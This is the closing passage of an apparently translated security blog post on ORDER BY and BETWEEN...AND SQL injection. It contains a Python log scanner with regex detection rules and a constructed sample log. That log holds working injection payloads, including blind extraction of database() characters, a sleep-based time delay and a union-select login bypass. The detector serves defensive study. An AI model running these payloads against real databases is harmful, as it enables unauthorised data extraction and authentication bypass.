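    ("between-hex-literals",
     re.compile(r"\bbetween\s+0x[0-9a-f]+\s+and\s+0x[0-9a-f]+", re.I)),
    ("between-on-builtin",
     re.compile(r"\b(?:database|user|version|schema)\(\)\s+between\b", re.I)),
    ("orderby-if",
     re.compile(r"\border\s+by\s+if\s*\(", re.I)),
    ("orderby-seeded-rand",            # rand() with no seed is ordinary shuffling
     re.compile(r"\border\s+by\s+rand\s*\(\s*[^)\s]", re.I)),
    ("orderby-sleep",
     re.compile(r"\border\s+by\b[^;]*\bsleep\s*\(", re.I)),
    ("union-orderby-ordinal",
     re.compile(r"\bunion\s+select\b.*\border\s+by\s+\d+\b", re.I)),
]

# Assumed general-log style line: timestamp, connection id, "Query", SQL text.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.+)$")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into its fields, or None if it is not a Query line."""
    m = LOG_LINE.match(line.strip())
    return m.groupdict() if m else None


def match_rules(sql: str) -> List[str]:
    """Names of every rule that fires on the given SQL text, in RULES order."""
    return [name for name, rx in RULES if rx.search(sql)]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """One finding per suspicious query: connection id, SQL text, rule names."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = match_rules(rec["sql"])
        if hits:
            findings.append({"conn": rec["conn"], "sql": rec["sql"], "rules": hits})
    return findings


# Constructed sample log (not a real capture); the query texts mirror the post.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z 12 Query select * from user order by id",
    "2024-01-01T10:00:02Z 12 Query select database() between 0x74 and 0x7a",
    "2024-01-01T10:00:03Z 13 Query select * from admin where username='admin' "
    "or 1 union select 1,2,binary 'x' order by 3",
    "2024-01-01T10:00:04Z 13 Query select * from ha order by if(1=2,1,sleep(1))",
    "2024-01-01T10:00:05Z 14 Query select * from ha order by "
    "rand(ascii(mid((select database()),1,1))>96)",
    "2024-01-01T10:00:06Z 14 Query select * from orders where price between 10 "
    "and 20 order by rand()",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["conn"], f["rules"], f["sql"])
```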
<p>
<span><strong>Afterword</strong></span></p>
<p>
ORDER BY injection actually shows up quite often in CTFs, but I had never written it up. This time I have put together a fairly complete summary (complete in my own estimation, XD) and published it along with the BETWEEN ... AND trick. Fellow practitioners are welcome to discuss.</p>
<p>
That is all for this article. I hope it is of some reference value for your study or work; if you have questions, leave a comment, and thank you for your support.</p>
<p>
Original article: https://www.anquanke.com/post/id/158674</p>